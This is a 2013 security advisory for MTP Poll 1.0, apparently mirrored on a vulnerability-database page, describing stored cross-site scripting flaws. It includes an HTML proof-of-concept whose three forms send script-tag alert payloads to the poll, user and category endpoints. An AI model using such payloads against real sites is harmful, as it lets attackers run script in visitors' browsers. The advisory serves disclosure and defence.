<!--
MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities
Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0
Summary: More than poll is a polling system with a powerful
administration tool. It features: multiple pools, templates,
unlimited options, IP Logging, cookie support, and more.
Desc: MTP Poll script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
Tested on: Linux, Apache2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5132
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php
17.02.2013
--><html>
<head>
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form action="http://localhost/poll_script/poll_add.php" method="POST">
<input name="question" type="hidden" value='"><script>alert(1);</script>'/>
<input name="color[]" type="hidden" value="#8bc6e1"/>
<input name="answer[]" type="hidden" value='"><script>alert(2);</script>'/>
<input name="img[]" type="hidden" value=""/>
<input name="status" type="hidden" value="1"/>
<input name="cat" type="hidden" value="0"/>
<input name="action" type="hidden" value="add"/>
<input type="submit" value="XSS #1"/>
</form>
<br/><br/>
<form action="http://localhost/poll_script/insert_user.php" method="POST">
<input name="ins_city" type="hidden" value='"><script>alert(3);</script>'/>
<input name="ins_country" type="hidden" value="MK"/>
<input name="ins_email" type="hidden" value="[email protected]"/>
<input name="ins_fname" type="hidden" value='"><script>alert(4);</script>'/>
<input name="ins_pass" type="hidden" value="thricerpass"/>
<input name="ins_username" type="hidden" value="thricer"/>
<input type="submit" value="XSS #2"/>
</form>
<br/><br/>
<form action="http://localhost/poll_script/ajax_cat_ins.php" method="POST">
<input name="name" type="hidden" value='"><script>alert(5);</script>'/>
<input type="submit" value="XSS #3"/>
</form>
</center></body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation